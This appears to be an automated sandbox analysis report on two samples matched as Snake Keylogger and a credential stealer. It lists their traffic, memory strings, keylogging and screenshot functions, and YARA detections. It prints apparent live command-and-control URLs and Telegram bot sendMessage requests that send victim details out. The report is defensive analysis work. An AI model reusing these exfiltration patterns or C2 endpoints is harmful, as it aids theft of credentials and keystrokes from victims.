Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2008/03/2025%20/%2020:54:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2008/03/2025%20/%2021:04:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 14:38:51 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 14:38:55 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: PvAmrCZENy.exe, 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: PvAmrCZENy.exe, 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: PvAmrCZENy.exe, 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: PvAmrCZENy.exe, 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: svchost.exe, 0000000D.00000002.2132995741.0000022AEB8C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mi
Source: svchost.exe, 0000000D.00000002.2132640961.0000022AEB800000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: qmgr.db.13.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.13.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.13.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.13.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.13.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.13.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.13.dr, qmgr.db.13.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: PvAmrCZENy.exe, 00000000.00000002.906373389.00000000032BC000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.942426959.0000000002970000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PvAmrCZENy.exe, 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: PvAmrCZENy.exe, 00000007.00000002.2137565262.000000000368C000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2138512374.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000026B8000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: PvAmrCZENy.exe, 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000026B8000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000026B8000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000026B8000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20a
Source: PvAmrCZENy.exe, 00000007.00000002.2137565262.000000000368C000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2138512374.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: PvAmrCZENy.exe, 00000007.00000002.2137565262.000000000368C000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2138512374.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: PvAmrCZENy.exe, 00000007.00000002.2137565262.000000000368C000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2138512374.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002F74000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002F65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: PvAmrCZENy.exe, 00000007.00000002.2131837876.0000000002760000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002F6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: PvAmrCZENy.exe, 00000007.00000002.2137565262.000000000368C000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2138512374.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: PvAmrCZENy.exe, 00000007.00000002.2137565262.000000000368C000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2138512374.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: PvAmrCZENy.exe, 00000007.00000002.2137565262.000000000368C000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2138512374.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: qmgr.db.13.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 0000000D.00000003.1206366037.0000022AEB710000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.dr, qmgr.db.13.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: PvAmrCZENy.exe, 00000007.00000002.2137565262.000000000368C000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2138512374.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: qmgr.db.13.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
Source: PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000026B8000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.0000000002621000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.0000000002691000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002EA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: PvAmrCZENy.exe, 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.0000000002621000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002E30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002EA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000026B8000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.0000000002691000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.000000000264B000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002EA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: PvAmrCZENy.exe, 00000007.00000002.2137565262.000000000368C000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2138512374.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: PvAmrCZENy.exe, 00000007.00000002.2137565262.000000000368C000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2138512374.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002FA5000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002F96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: PvAmrCZENy.exe, 00000007.00000002.2131837876.0000000002791000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49688
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49684 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49688 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49682 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49720 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot
Source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode
Source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.yxXYABHh.exe.4149990.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.yxXYABHh.exe.4149990.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.yxXYABHh.exe.4149990.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.yxXYABHh.exe.3949970.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.yxXYABHh.exe.3949970.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.yxXYABHh.exe.3949970.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.yxXYABHh.exe.3949970.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.yxXYABHh.exe.3949970.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.yxXYABHh.exe.3949970.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: PvAmrCZENy.exe PID: 7112, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: yxXYABHh.exe PID: 5912, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 0_2_02FFDC5C	0_2_02FFDC5C
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 0_2_075EA740	0_2_075EA740
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 0_2_075EECC8	0_2_075EECC8
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 0_2_075EBA10	0_2_075EBA10
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 0_2_075EA730	0_2_075EA730
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 0_2_075EE050	0_2_075EE050
